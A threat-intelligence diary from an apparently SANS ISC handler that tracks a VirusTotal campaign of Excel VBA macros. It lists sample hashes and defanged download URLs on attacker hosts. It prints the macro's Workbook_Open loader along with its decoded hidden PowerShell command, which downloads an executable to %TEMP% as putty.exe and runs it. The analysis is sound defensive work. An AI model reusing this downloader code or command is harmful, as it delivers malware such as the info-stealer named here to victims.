Tracking A Malware Campaign Through VT
During the weekend, I found several samples from the same VBA macro. The only difference between all the samples was the URL to fetch a malicious PE file. I have a specific YARA rule to search for embedded PowerShell strings and my rule fired several times with the same pattern and similar size. Here is the pattern:
31 78 77 64 58 52 30 65 53 35 6C 65 47 55 6E 4B 1xwdXR0eS5leGUnK 54 73 6F 54 6D 56 33 4C 55 39 69 61 6D 56 6A 64 TsoTmV3LU9iamVjd 43 41 74 59 32 39 74 49 46 4E 6F 5A 57 78 73 4C CAtY29tIFNoZWxsL
YARA reacted on 'TmV3LU9iamVjd' which is the Base64-encoded string 'New-Object'.
I downloaded several files to analyze them:
| Hash | Score | Timestamp | Submission | Country |
|---|---|---|---|---|
| 2169c95c7587d4876449e0a57cb0f057d9df19e867a73e83e63aeaca1e2d4eae | 8/58 | 2020-08-20 02:05:10 UTC | e74f3978 | US |
| c5f3874b7cd7ae726b12b7488d374972cb63b6e7dac73d71ededc20d80cf8318 | 9/57 | 2020-08-20 03:39:30 UTC | e74f3978 | US |
| d86cfc2c43a0599b23416cfc3be08e8c3d8d2b2b7b7b935b76d8ec6aa70e1705 | 8/58 | 2020-08-20 01:13:49 UTC | e74f3978 | US |
| 174b27b020f930f5395cd993e92ebfc2795b1f3664265be7cea9d1405e870cd0 | 7/58 | 2020-08-19 19:30:20 UTC | e74f3978 | US |
| caf1e1da396743767f9e2a3c4b85780bc0146aeaae8bed18aef9d5c918fda439 | 9/57 | 2020-08-21 00:05:49 UTC | e74f3978 | US |
| b52f376b6b49a7c73e7a0befc821661bb9f19f5b4cf1561f277f7d347745a199 | 9/57 | 2020-08-20 22:57:00 UTC | e74f3978 | US |
| ef20a30463d0935ab34f119604ad5890c2d2ee0e4e400ed43c7faf4a8fd5b528 | 9/58 | 2020-08-20 22:43:53 UTC | e74f3978 | US |
| 670a126982f22add8d6a8f662ec67691f64484d6d86fff76adae5804b7e8939c | 8/56 | 2020-08-20 23:44:18 UTC | e74f3978 | US |
| b0f6c17244c2f8cce46425212f5cf9786fbd36727c34bf4d10d90d6a073a539e | 9/57 | 2020-08-20 23:58:14 UTC | e74f3978 | US |
| d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb | 8/57 | 2020-08-20 22:45:54 UTC | e74f3978 | US |
| b8f308694b369a2e4d0a51966e6962eb0f2ac55e9cddcbbe726b0f867f9e6a66 | 8/58 | 2020-08-20 23:39:47 UTC | e74f3978 | US |
| 670a126982f22add8d6a8f662ec67691f64484d6d86fff76adae5804b7e8939c | 9/57 | 2020-08-22 03:56:41 UTC | e74f3978 | US |
| ef20a30463d0935ab34f119604ad5890c2d2ee0e4e400ed43c7faf4a8fd5b528 | 9/57 | 2020-08-22 03:31:37 UTC | e74f3978 | US |
| 670a126982f22add8d6a8f662ec67691f64484d6d86fff76adae5804b7e8939c | 9/57 | 2020-08-22 03:56:41 UTC | e74f3978 | US |
| d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb | 9/56 | 2020-08-22 03:54:50 UTC | e74f3978 | US |
| 2169c95c7587d4876449e0a57cb0f057d9df19e867a73e83e63aeaca1e2d4eae | 9/58 | 2020-08-22 03:45:04 UTC | e74f3978 | US |
| b8f308694b369a2e4d0a51966e6962eb0f2ac55e9cddcbbe726b0f867f9e6a66 | 8/56 | 2020-08-22 03:37:19 UTC | e74f3978 | US |
| 566e46a36fbeadf23a43541d8fb19d5d1cd8f3e33b60abef221a1f6a1af0f1cb | 9/57 | 2020-08-22 03:34:29 UTC | e74f3978 | US |
As you can see, all samples were submitted from the US and from the same account. Their scores are also very close to each other.
All of them contain the same VBA macro and the only difference is the downloader link:
$ diff \ c5f3874b7cd7ae726b12b7488d374972cb63b6e7dac73d71ededc20d80cf8318 \ d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb 10c10 < Loader"aHR0cDovLzE5OC4xMi42Ni4xMDQvbVZQMjlVQVl4bEZsU3JGLmV4ZQ==" --- > Loader"aHR0cDovLzE5OC4xMi42Ni4xMDYvZmxvY3J5cHRlZC5leGU="
Here is the list of extracted URLs:
$ grep 'Loader"' * | awk -F '"' '{ print $2}' | while read L; do echo $L | base64 -d; echo ; done
hxxp://198[.]12[.]66[.]104/bOYzlVIPPDT3m7g[.]exe
hxxp://198[.]12[.]66[.]106/924ZJpzgdvpZuNt[.]exe
hxxp://198[.]12[.]66[.]106/TuSQk2FmRK1iLJI[.]exe
hxxp://198[.]12[.]66[.]104/jojocrypted[.]exe
hxxp://198[.]12[.]66[.]106/royalcrypted[.]exe
hxxp://brandotoday[.]com/Sample3[.]exe
hxxp://198[.]12[.]66[.]104/99crypted[.]exe
hxxp://198[.]12[.]66[.]104/mVP29UAYxlFlSrF[.]exe
hxxp://198[.]12[.]66[.]104/miccrypted[.]exe
hxxp://198[.]12[.]66[.]106/flocrypted[.]exe
hxxp://198[.]12[.]66[.]106/qlOZ1gn6tOo0tx7[.]exe
hxxp://198[.]12[.]66[.]106/vipcrypted[.]exe
The macro is a simple but effective one. It tries to download and execute the payload as 'putty.exe':
Private Sub Workbook_Open()
Loader"aHR0cDovLzE5OC4xMi42Ni4xMDYvZmxvY3J5cHRlZC5leGU="
End Sub
Public Sub Loader(Link As String)
CreateObject(AWqQ32PO095TRDFvcBBnMZAqQP87BXCVrwe_QARWE("57 53 63 72 69 70 74 2E 53 68 65 6C 6C")).Run (Base64Decode("cG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVcgSGlkZGVuIC1jb21tYW5kIChuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJw==" & Link & "JywkZW52OlRlbXArJ1xwdXR0eS5leGUnKTsoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4ZWN1dGUoJGVudjpUZW1wKydccHV0dHkuZXhlJyk="))
End Sub
The decoded executed content is:
CreateObject(WScript.Shell)).Run( \
powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile(' \
& Link & \
',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
All downloads failed but I found a sample already available on VT[1]. It looks like an Agent Tesla.
The question is: who's behind the submission key and submitted so many times those samples? VT does not allow us to search all submissions from the same account (which could be a great feature for hunting purposes!).
Some possible scenario:
- Developers of the macro who are testing their macro? I don't think because just the link changes across all the submissions
- An organization that's facing many similar documents and they have an automatic submission to VT?
- Another security researcher?
While writing this diary, I still found five new samples, it's still ongoing!
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments